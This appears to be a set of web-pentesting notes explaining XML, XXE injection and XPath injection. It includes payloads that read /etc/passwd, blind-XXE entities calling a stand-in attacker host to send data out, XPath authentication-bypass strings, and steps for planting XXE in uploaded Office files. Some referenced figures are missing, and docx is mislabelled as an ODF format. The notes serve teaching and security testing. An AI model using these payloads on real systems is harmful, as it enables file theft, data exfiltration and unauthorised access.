• XML stands for Extensible Markup Language.

  • It is a standardized way to store structured data which is both human & machine readable.

  • They're comprised of elements or tags. Tags can contain text or other tags such as attributes, which contain values.

  • Optional element is the Document Type Definition [DTD]

    • Used to define the structure of the document so that a parser can determine whether the document is well formed or cannot be validated.

  • When a DTD is parsed by an XML parser, it generates a Document Object Model[DOM]. The DOM is queried programmatically later on to extract data from the document.

For example, when the above document is parsed into a DOM in Java. The following queries are used to extract data from the DOM.

XXE [XML External Entity Injection]

If a user wanted to create a <tag> with the content "I <3 XML", the XML parser would error out because it thinks the < bracket is a beginning of a tag. This is where Entities are helpful.


  • String representation of specific characters.

  • 5 Predefined entities.

Custom entities can be defined in DOM.

  • Custom entities are only fully expanded when they are needed by the parser. For example an external HTTP URI, will not be fetched at the time of declaration, but only if the entity is referenced in the XML Document.

  • Internal Entities: Entities that represent some data within the document, defined as a string.

    • Useful when referencing the same long string multiple times in the document.

  • Recursive Entities: Below, when bar2 is referenced, the XML parser recursively expands the bar entitiy as well.

Denial of Service Attack : Billion Laughs attack uses the above concept. 1 billion lols ~ 4GB memory.

  • External Entities: Entities which represent some data located outside of the document, defined as a URI. Left upto the XML parser how a URI is processed to fetch the data.

In this case, the external entity bar followed by the keyword SYSTEM is used to define URI to a web server. The XML parser parses &bar; issues an HTTP request to the URI and stores the response in the DOM. URI processing is upto the parser.


  • file://

  • ftp://

  • php://filter/

  • expect:// [Useful for RCE]

This occurs because developers do not disable external entities. The libraries do not disable them by default.

The following entity can be declared, for example:

<!DOCTYPE test [
    <!ENTITY foo SYSTEM "file:///etc/passwd">]>

http://URL/?param1=<!DOCTYPE test [<!ENTITY foo SYSTEM "file:///etc/passwd">]><test>%26foo;</test>

You can then simply use the reference to foo: &foo; (don't forget to encode &) to get the corresponding result inserted in the XML document during its parsing (server side).

  • Parameter Entities

    • Can only be defined within a DTD.

    • Created by adding a % before the entity declaration.

    • Useful when regular entities are disabled.

    • Useful for blind XXE.

They can be used to dynamically declare other parameter entities. The entity bar represents a string which contains another entity declaration. Here &#x25; is hex encoding for %. Otherwise the parser would think we're referencing another parameter entity. Only after bar is referenced, bar2 is referenced.

External DTDs

A DTD with entity definitions can be hosted externally and then referenced in the XML document.

Blind XXE

  • Occures when parsed entities are not returned to the user. The URIs are still accessed however, and combination of internal, external DTD and dynamically declared parameter entities can be used to exfiltrate data.

Error based

Vulnerability can lead to

  • Local File Inclusion.

  • SSRF

  • Blind attacks (Data exfil)

  • Denial of service

  • RCE (sometimes)


Xpath Injection

  • XPath is a query language, which selects nodes from an XML document. There are no access level permissions and it is possible to refer almost any part of an XML document unlike SQL which allows restrictions on databases, tables or columns

  • Imagine the XML document as a database, and XPath as an SQL query.

  • If you can manipulate the query, you will be able to retrieve elements to which you normally should not have access.

#Identify by looking for 'xpath()' errors in the response.

Theory of Attack

#Sample XML Document
<?xml version=”1.0" encoding="utf-8"?>
 <Employee ID="1">
 <Password>This is Secret</Password>
 <Employee ID="2">
  • XML Query

"//Employee[UserName/text()='" & Request("UserName") & "' And Password/text()='" & Request("Password") & "']"

If we insert a malicious payload as user name, the XPath query generated would be as follows:

Username : test' or 1=1 or 'a'='a 
Password : testXPath Query: 
//Employee[UserName/text()='test' or 1=1 or 'a'='a' And Password/text()='test']This is equivalent to:
//Employee[(UserName/text()='test' or 1=1) or ('a'='a' And Password/text()='test')]

Thus, the first part of the query becomes true and the second part is neglected. The password becomes irrelevant and the attacker gets unauthorized access to the website.


  • To comment out the rest of the XPath expression, you can use a NULL BYTE (which you will need to encode as %00)

#If we want all results
hacker' or 1=1]%00 

#Accessing child nodes:
hacker' or 1=1]/child::node()%00&password=test

#Select parent of the current node, display all child nodes
hacker' or 1=1]/parent::*/child::node()%00

#Display specific child node. Here it is 'password'
hacker' or 1=1]/parent::*/password%00

Blind XXE

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> ]> 

#Using XML parameter entities as follows:
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]> 

XXE in File Parsing

Open Document Format is a zip-compressed, XML-based file format.

  • Files in ODF format: docx, pptx, xlsx, odt ,ods ,odp and more

  • The files are zip collection of multiple XML's which are parsed to processing.

  • A user can edit these XML files and inject an XXE payload. If the backend XML parser allwoed XML External Entities, an attacker can abuse it to perform an XXE attack.


Methodology in Identifying Vulnerability

  1. Response after a successful file upload. The XML parser is reading something from the docx file configuration and fetching it to the user.

2. Open file.docx in Vi & identify the location where the above response is present.

3. Insert payload at the correct parsing location.

4. Upload file. Payload is executed.

Last updated